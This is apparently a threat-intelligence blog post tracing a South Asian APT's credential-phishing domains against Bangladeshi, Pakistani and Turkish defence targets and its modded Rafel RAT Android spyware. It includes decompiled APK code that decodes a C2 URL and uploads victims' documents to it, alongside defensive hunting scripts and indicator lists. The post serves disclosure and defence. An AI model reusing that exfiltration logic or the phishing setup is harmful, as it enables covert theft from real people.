A South Asian APT has been persistently targeting Sri Lanka, Bangladesh, Pakistan, and Turkey. This post walks through infrastructure and malware pivots to expose novel tooling that compromised the phones of military-adjacent folks.
Recently a zip was detected named Coordination of the Chief of Army Staff's Visit to China.zip. An archive with this theme sticks out like a sore thumb to threat analysts.
Indeed, upon examining the compressed PDF, it was an obviously targeted phish.
Figure 1: Top level PDF phish

Figure 2: Decoy shown post cred theft
The first pivot an analyst makes is to look for similarly named documents, or documents that embed similar URLs. That search yielded the results below:
| Document Name | MD5 Hash | First Stage | Second Stage |
|---|---|---|---|
| Coordination of the Chief of Army Staff's Visit to China.pdf | cf9914eca9f8ae90ddd54875506459d6 | mail-mod-gov-bd-account-conf-files.netlify.app | mailbox3-inbox1-bd.com |
| Coordination of the Chief of Army Staff's Visit to China.pdf | 94e6911b0a99b54391735dfc70b4187d | coordination-cas-visit.netlify.app | mails.navy.mll.bd.account.file.centralized-email-system-np.com |
| Coordination of the Chief of Army Staff's Visit to China.pdf | 3c47053adffd39b467592d13398060b5 | mail-dgfi-gov-bd-accounts-file-data-d.netlify.app | mailbox3-inbox1-bd.com |
| Updated TOSAM 120 MM MORTAR ALKAR 110, 120, TURKIYE.pdf | 33fe3e792a0e98fb890b6393f31ae5cb | drive-rokectsaans-com-tr-account-file.netlify.app | mailbox3-inbox1-bd.com |
| MAIN KEY POINTS OF CAS VISIT TO BOF (1).pdf | 73f142ae7c6c10fbb18f439b6410af4f | goc-visit-program-details-pdf.netlify.app | mailbox-inbox-bd.com |
| 079 24 CE Combined Training and Administrative Conference signed.pdf | c2ee24fb4aa103b4c1a8e8169d3a9f47 | combined-training-and-administrative.netlify.app | discord |
| Review .pdf | e573a2cd2b6a24255c400055d06342b9 | sdkfjsh23-sdfgdklhg4-efglhdfg4-dfgjkl.netlify.app | discord |
| MOU ON DEFENCE COOPERATION BETWEEN BANGLADESH AND KINGDOM OF SAUDI ARABIA KSA.pdf | 6e930ad2ab7e97da818f54bfbb45b759 | mail.gov.bd.account.file.updatemind52.com | mailbox-inbox-bd.com |
| SECRETARY OF DEFENCE INDUSTRIS OF THE PRESIDENCY OF THE REPUBLIC OF TURKIYE'S DELEGATION VISIT TO BD.pdf | abbb7063e3a6d03cf180f73b6ac15ee2 | mail.drive.gov.bd.files.updatemind52.com | - |
| AMDT EXAM CEN AND ALLOT INDEX NUMBER FOR PE (CAPT TO MAJ)-APR 2025.pdf | aef81736c6dcaf8b67775602cbf9ccbd | ebmail.police.gov.bd.updatemind52.com | mailbox-inbox-bd.com |

Figure 3: IDEF-themed phishing page, targeting Turks
The JavaScript that attempted to block “source viewing”, as seen in the image above, appeared unique. Searching for other phishing pages that contained the same blocker yielded quick results. The folks at Hunt IO regularly blog about an adjacent set of activity, as do OSINT analysts Demon and Nouman.
| Phishing Domain | Spoof / Theme |
|---|---|
| dgdp-account-file-data-doc-procuremen.netlify.app | Directorate General of Defence Purchase (DGDP) |
| dgdp.cloud.secured.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| drive-afd-gov-bd-account-file.netlify.app | Government of Bangladesh |
| drive-army-mil-bd-account-data-file.netlify.app | Bangladesh Army |
| drive-baf-mil-bd-share-file.netlify.app | Bangladesh Air Force |
| drive-bcc-registraion-cloud-storage.netlify.app | Bangladesh Computer Council (BCC) |
| drive-newmail-arm-mil-bd-account-data.netlify.app | Bangladesh Army |
| drive-rokectsaans-com-tr-account-file.netlify.app | Roketsans (Turkey) |
| drive-roketsans-com-tr-account-files.netlify.app | Roketsans (Turkey) |
| embassy-of-italy-visit-to-cxb.netlify.app | Embassy of Italy |
| goc-visit-program-details-pdf.netlify.app | Gulf Countries |
| idef-2025-conf-data-file-tr-account-d.netlify.app | IDEF (International Defence Industry Fair) |
| idef2025-com-tr-files-drive-account.netlify.app | IDEF (International Defence Industry Fair) |
| mail-afd-gov-bd-account-error-issues.netlify.app | AFD Government of Bangladesh |
| mail-aselsans-com-tr-account-files-da.netlify.app | Aselsan (Turkish company) |
| mail-baf-mil-bd-account-data-files-document.pages.dev | Bangladesh Air Force |
| mail-baf-mil-bd-fils-cas-visit-to-chi.netlify.app | Bangladesh Air Force |
| mail-bof-gov-bd-cas-visit.netlify.app | BOF Government of Bangladesh |
| mail-dgfi-gov-bd-accounts-file-data-d.netlify.app | Directorate General of Forces Intelligence (DGFI) |
| mail-mod-gov-bd-account-conf-files.netlify.app | Ministry of Defence (MOD) |
| mail-mod-gov-bd-account-data-file.netlify.app | Ministry of Defence (MOD) |
| mail-mod-gov-np-account-file-data.netlify.app | Ministry of Defence (MOD) |
| mail.baf.mil.bd.pdf.quickhelpsolve.com | Bangladesh Air Force |
| mail.bcc.gov.bd.pdf.quickhelpsolve.com | Bangladesh Computer Council (BCC) |
| newmail-army-mil-bd-owa-apth-mail-dat.netlify.app | Bangladesh Army |
| newmail-army-mil-bd-pso-meeting-file.netlify.app | Bangladesh Army |
| webmail.police.gov.bd.updatemind52.com | Bangladesh Police |
| coordination-cas-visit.netlify.app | - |
Reexamining our previous set of C2s, there was another error message we could key off. The landing page on the domain was reused, and it hard-coded a particular Unix timestamp corresponding to March 28th, 2025.

Figure 4: Landing page with hard coded timestamp
The same landing page was seen on many other similar-looking domains:
| Phishing Domain | Spoof / Theme |
|---|---|
| mail.afd.gov.bd.file.quickhelpsolve.com | AFD Government of Bangladesh |
| webmil.assangroup.com.tr.asd.updatemind52.com | Assan Group (Turkish company) |
| mail.bcc.gov.bd.pdf.quickhelpsolve.com | Bangladesh Computer Council (BCC) |
| mails.navy.mll.bd.account.file.centralized-email-system-np.com | Bangladesh Navy |
| webmail.police.gov.bd.updatemind52.com | Bangladesh Police |
| dgdp.gov.bd.file.pdf.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| dgdp.gov.bd.cloud.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| dgdp.cloud.secured.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| cloud.dgdp.gov.bd.file.updatemind52.com | Directorate General of Defence Purchase (DGDP) |
| mail.dgfi.gov.bd.pdf.updatemind52.com | Directorate General of Forces Intelligence (DGFI) |
| mail.gov.bd.account.file.updatemind52.com | Government of Bangladesh |
| mail.drive.gov.bd.files.updatemind52.com | Government of Bangladesh |
| mail.mofa.gov.pk.pdf.updatemind52.com | Ministry of Foreign Affairs (MOFA) Pakistan |
| mail.mofa.gov.pk.file.updatemind52.com | Ministry of Foreign Affairs (MOFA) Pakistan |
| cloud.national.email.pdf.updatemind52.com | - |
| webmail.paragonms.com.pk.pdf.updatemind52.com | Paragon (Pakistan-based company) |
| webmail.profen.com.pdf.updatemind52.com | Profen |
| webmail.timgosavunma.com.tr.file.updatemind52.com | Timgos Savunma (Turkish company) |
| mail.163.com.files.updatemind52.com | - |
| mail.awany.org.file.updatemind52.com | - |
| mailairforce.quickhelpsolve.com | Bangladesh Air Force mail |
| mail.bangladesh.air.quickhelpsolve.com | Bangladesh Air Force |
| dgdp.cloud.files.pdf.updatemind52.com | Bangladesh DGDP |
| dgdp.cloud.file.pdf.updatemind52.com | Bangladesh DGDP |
| dgdp.cloud.secured.file.updatemind52.com | Bangladesh DGDP |
| dgdp.gov.bd.secured.updatemind52.com | Bangladesh DGDP |
| drive.egovcloud.gov.bd.quickhelpsolve.com | Bangladesh government |
| inboxofficial-bd.com | Bangladesh government |
| webmail.police.gov.bd.updatemind52.com | Bangladesh police |
| mail.bhclondon.org.uk.quickhelpsolve.com | Bangladesh High Commission |
| webmail.bmsdefence.com.pdf.updatemind52.com | BMS Defence |
| bsgrouponline.com.webmail.pdf.updatemind52.com | - |
| live.login.account.out.quickhelpsolve.com | - |
| cloud.national.email.file.updatemind52.com | - |
| www.centralized-email-system-np.com | Nepal government |
| profen.com.fil.login.updatemind52.com | Profen login |
| apm.vpce.gdw55e.quickhelpsolve.com | - |
| updatemind52.com | - |
| quickhelpsolve.com | - |
| play-googyle.com | - (more analysis by Aaron Samala / Checkpoint) |
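The two domain tables above show the same two naming tricks over and over: a free-hosting subdomain (netlify.app, pages.dev) whose single label is a hyphenated copy of the target's domain (mail-mod-gov-bd-...), and a dotted form where the target's domain is buried as inner labels of an actor-owned name (mail.mofa.gov.pk.pdf.updatemind52.com). The hunting heuristic below is an added example written for this post, not the authors' tooling; the hostnames it runs on are taken from the tables, except mail.mod.gov.bd, which is a constructed legitimate-looking control, and the suffix lists are assumptions drawn from the targeting described here.

```python
# Free hosting platforms seen serving first-stage pages in the tables above
FREE_HOSTS = ("netlify.app", "pages.dev")
# Public suffixes of the spoofed organisations (Bangladesh, Pakistan, Nepal, Turkey);
# an assumption based on the targeting in this post, extend as needed
TARGET_SUFFIXES = ("gov.bd", "mil.bd", "gov.pk", "com.pk", "gov.np", "com.tr")


def registrable_domain(host: str) -> str:
    """Approximate eTLD+1: the last two labels, or the last three when the
    host sits directly under one of the multi-part suffixes above."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TARGET_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def spoof_indicators(host: str) -> list[str]:
    """Reasons a hostname matches the actor's two spoofing patterns
    (an empty list means neither pattern matched)."""
    host = host.lower().strip(".")
    reg = registrable_domain(host)
    reasons = []

    # Pattern 1: a free-hosting subdomain whose single label embeds a target
    # suffix with dots swapped for hyphens, e.g. mail-mod-gov-bd-....netlify.app
    for free in FREE_HOSTS:
        if host.endswith("." + free):
            label = "-" + host[: -len(free) - 1] + "-"
            for suffix in TARGET_SUFFIXES:
                if "-" + suffix.replace(".", "-") + "-" in label:
                    reasons.append(f"{free} label embeds {suffix}")

    # Pattern 2: the dotted form, e.g. mail.mofa.gov.pk.pdf.updatemind52.com,
    # where the target suffix is an inner run of labels and the registrable
    # domain is an actor-owned name
    for suffix in TARGET_SUFFIXES:
        if "." + suffix + "." in "." + host + "." and not reg.endswith(suffix):
            reasons.append(f"inner labels {suffix} under {reg}")
    return reasons


if __name__ == "__main__":
    # Hostnames from the tables above, plus one constructed legitimate-looking control
    for h in ("mail-mod-gov-bd-account-conf-files.netlify.app",
              "mail.mofa.gov.pk.pdf.updatemind52.com",
              "coordination-cas-visit.netlify.app",
              "mail.mod.gov.bd"):
        print(h, "->", spoof_indicators(h) or "no match")
```

Hosts like coordination-cas-visit.netlify.app, which carry no spoofed suffix at all, are deliberately not flagged; those still need the content pivots (the source-view blocker, the hard-coded timestamp) described in the text.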
Pivoting on updatemind52.com, which was also mentioned by Twitter user AiTM, we can see an APK file hosted at updatemind52.com/Love_Chat.apk. This is a mod of an open source Android RAT, Rafel RAT, the source of which can be reviewed here.
| File | MD5 Hash |
|---|---|
| updatemind52.com/Love_Chat.apk | 9a7510e780ef40d63ca5ab826b1e9dab |
Below, we can see the decompiled APK file uploading various document types from the device to the c2.
Figure 5: h/t to dex2jar

```java
// Decompiled from Love_Chat.apk (dex2jar output); the C2 URL is stored base64-encoded
public InternalService() {
    byte[] arrayOfByte = Base64.decode("aHR0cHM6Ly9xdWlja2hlbHBzb2x2ZS5jb20vcHVibGljL2NvbW1hbmRzLnBocA==", 0);
    this.decodedBytes = arrayOfByte;
    this.SERVER_URI = new String(arrayOfByte);
}

// Only non-empty files with document or image extensions are sent to the C2
private void processFile(File paramFile) {
    if (paramFile.length() == 0L)
        return;
    String str = paramFile.getAbsolutePath();
    if (str.endsWith(".pdf") || str.endsWith(".ppt") || str.endsWith(".pptx") ||
        str.endsWith(".doc") || str.endsWith(".jpeg") || str.endsWith(".jpg") ||
        str.endsWith(".docx") || str.endsWith(".xls") || str.endsWith(".xlsx"))
        uploadFile(paramFile);
}

// Multipart POST of the file plus the device identifier; the response and any error are ignored
private void uploadFile(File paramFile) {
    HashMap<Object, Object> hashMap = new HashMap<Object, Object>();
    hashMap.put("device_id", this.deviceUniqueId);
    AndroidNetworking.upload(this.SERVER_URI).addMultipartFile("upload_file_nm", paramFile)
        .addMultipartParameter(hashMap)
        .setPriority(Priority.HIGH).setExecutor(Executors.newSingleThreadExecutor()).build()
        .getAsJSONObject(new JSONObjectRequestListener() {
            final InternalService this$0;

            public void onError(ANError param1ANError) {}

            public void onResponse(JSONObject param1JSONObject) {}
        });
}
```

The literal aHR0cHM6Ly9xdWlja2hlbHBzb2x2ZS5jb20vcHVibGljL2NvbW1hbmRzLnBocA== decodes to the C2, https://quickhelpsolve.com/public/commands.php, which we saw used by this actor for credential phishing. That same domain was used in the malicious APK b8eda465ffbc197d80a9ce7ab785f07a, and with other simple pivots we can find a cluster of other APKs.
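Because the C2 is a plain base64 literal passed to Base64.decode(), and the exfiltration filter is a chain of endsWith() checks, both can be pulled straight out of decompiled sources without running the sample. The triage script below is an added example written for this post, not the authors' tooling: it scans a constructed Java fragment shaped like the InternalService class above (the first base64 literal is the one from the sample; the other two are constructed to show a non-URL string and a malformed literal being skipped).

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Constructed sample: a fragment shaped like the decompiled InternalService above.
# The first base64 literal is the one from the sample; the other two are
# constructed to show a non-URL string and an invalid literal being skipped.
SAMPLE_SOURCE = '''
public InternalService() {
    byte[] arrayOfByte = Base64.decode("aHR0cHM6Ly9xdWlja2hlbHBzb2x2ZS5jb20vcHVibGljL2NvbW1hbmRzLnBocA==", 0);
    this.SERVER_URI = new String(arrayOfByte);
    byte[] tag = Base64.decode("aGVsbG8=", 0);
    byte[] junk = Base64.decode("abc", 0);
}
private void processFile(File f) {
    String str = f.getAbsolutePath();
    if (str.endsWith(".pdf") || str.endsWith(".docx") || str.endsWith(".xlsx"))
        uploadFile(f);
}
'''

B64_DECODE_CALL = re.compile(r'Base64\.decode\(\s*"([A-Za-z0-9+/=]+)"')
ENDS_WITH = re.compile(r'endsWith\(\s*"(\.[A-Za-z0-9]+)"\s*\)')


def decoded_urls(source: str) -> list[str]:
    """Decode every Base64.decode("...") literal and keep the http(s) URLs."""
    found = []
    for literal in B64_DECODE_CALL.findall(source):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # malformed base64 or a binary payload: not a URL string
        parsed = urlparse(text)
        if parsed.scheme in ("http", "https") and parsed.netloc:
            found.append(text)
    return found


def harvested_extensions(source: str) -> set[str]:
    """File extensions selected by endsWith() filters, i.e. what gets uploaded."""
    return set(ENDS_WITH.findall(source))


if __name__ == "__main__":
    print("C2 URLs:", decoded_urls(SAMPLE_SOURCE))
    print("Uploaded extensions:", sorted(harvested_extensions(SAMPLE_SOURCE)))
```

Run it over the whole jadx or dex2jar output tree (one file at a time) and the netloc of each decoded URL is the domain to pivot on, as done with quickhelpsolve.com in the text.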
| App Name | MD5 | C2 | Decoy |
|---|---|---|---|
| Love_Chat.apk | 9a7510e780ef40d63ca5ab826b1e9dab | quickhelpsolve.com | - |
| TestMe.apk | 78bc9707f298552b7087ef385f098912 | kutcat-rat.com | lovehabibi.com |
| PvtChat1.apk | dfa353ac65b29df7d14f72aca7d52f12 | kutcat-rat.com | lovehabibi.com |
| - | b8eda465ffbc197d80a9ce7ab785f07a | quickhelpsolve.com | lovehabibi.com |
| PvtChat.apk | ce417487ac9ccfbb31fa28fde9365fd7 | kutcat-rat.com | isexychat.com |
| TestMe.apk | 67e7cf00aa82d9b4cf0db2b55b7fb0b9 | kutcat-rat.com | - |
| - | 0d106fd047d6a744b1dbecddbe9c2e99 | kutcat-rat.com | - |
| Social Chat.apk | 01011bd3c58141165f2a4551f4c40609 | kutcat-rat.com | playservicess.com |
| Securechat.apk | 65a08e14ca41bfedf483d1ada74844a9 | kutcat-rat.com | lovehabibi.com |
| Securechat.apk | c8d2bf204349853b6d7d810ed2698924 | kutcat-rat.com | lovehabibi.com |
| voting.apk | 12b6483d4843e99b57b86379197208cd | kutcat-rat.com | UN voting page |
| BSM.apk | 3b26fcd7c6994598dc53bb3f69725d68 | play-googyle.com | whatsapp download |

Figure 6: obligatory non-ida ida screenshot showing how the decoy was launched
The apps themselves are standard infostealers that also carry a remote shell for executing arbitrary commands. Sample permissions and actions include, but are not limited to, ADD_DEVICE_ADMIN, READ_EXTERNAL_STORAGE, MANAGE_APP_ALL_FILES_ACCESS_PERMISSION, READ_CONTACTS and READ_MEDIA_VIDEO.
The landing pages and decoys are similar to what one would expect. A notable Pakistani dating service was a key pivot point to find other related samples.



From the play-googyle.com and playservicess.com domains above, we can see a crossover in the registrant email in the WHOIS scanner of the free community version of SilentPush. This registrant, noraramly30121982@yahoo.com, was seen in 2024 on another similar domain, mailservicess.com. Additionally, the same address on Gmail (noraramly30121982@gmail.com) was used to register mailserver-lk.com, which has been used prolifically for phishing and has been catalogued by ThreatBook as well as our own Labs account. As always, Maltrail is a great resource for aggregating indicators from the OSINT community.

Figure 10: SilentPush free WHOIS scanner
The kutcat C2 is a modded version of Rafel-rat, notably with the original author's credits removed from the panel. The C2 can send arbitrary commands down to compromised phones. If you have good DNS telemetry, gj3nyrs9jqrslv5hbej92406cxin6c.burpcollaborator.net may be a useful indicator. kutcat-rat.com was also mentioned by Twitter user MHT.

Figure 11: Commands sent to selected compromised phones
Below is the C2 panel, which was publicly available and indexed by Google, showing device information; it was disabled prior to this blog post. The server held a plethora of stolen content, including documents, raw SMS, and contact lists. From that content it was abundantly clear that many of the victims were members of the militaries of multiple South Asian countries, or their close contacts, based on phone address books that consisted only of ranks and duty stations.

Figure 12: C2 panel




Figure 16: Victims by country

The first phone UUID in the list, ffffffff-e76f-903a-ffff-ffffef05ac4a, reports to be in India and has the APK SetupIndiaServicesTnC.apk installed. The first phone on an operational server is often a test/developer account, and in this case it contained data from a test rig. A consecutive UUID, ffffffff-e76f-903a-ffff-ffffef05ac4b, also appears in the device list. The UUID is constructed using nisrulz's easydeviceinfo.

Lastly, the threat actor also uses Windows malware that leverages the same C2 infrastructure. These samples are available in the index.
| Top level file | Intermediary | C2 |
|---|---|---|
| EX AMAN-2025.zip | updatemind52.com/asdf.6786708906 | play-googyle.com |
| 4e13a48db966b3ebffb1fd49b3d2af8e | quickhelpsolve.com/asdf.6786708906 | play-googyle.com |
| outgoing Farewell - Invitation.zip | - | play-googyle.com |
| Vendor | Name |
|---|---|
| Proofpoint | UNK_ArmyDrive |
| You? | Get in touch for blog pre-releases! |
Figure 19: Vendor validated names
Our GitHub provides a download of the relevant files mentioned in the blog, except those that contain victim-identifying information.
| Hunting leads you may find useful |
|---|
| C:\Users\Android\Desktop\full working with all and url encrypt\x64\Release\ConsoleApplication1.pdb |
| C:\Users\Android\Desktop\lsass - Copy\x64\Release\ConsoleApplication1.pdb |
| C:\Users\Android\Desktop\work\d\x64\Release\ConsoleApplication1.pdb |
| C:\Users\user\Desktop\c\d\x64\Release\ConsoleApplication1.pdb |
| C:\Users\user\Desktop\cache\apk\c\i\x64\Debug\ConsoleApplication1.pdb |
| C:\Users\user\Desktop\ppp\app\c\d\x64\Debug\ConsoleApplication1.pdb |
| Network strings containing "ghijkl" |
| Email addresses containing noraramly30121982 or qesy.35fysel (securedownloadfiles.com → downloadattachment.com) |
| midtearmy@gmail.com, itdtearmy@gmail.com |
Acknowledgements
The authors would like to thank the reviewers, as well as peer vendors, for their comments and corrections. Please get in touch at research@strikeready.com if you have corrections, would like us to use your group name, or would like to collaborate on research.
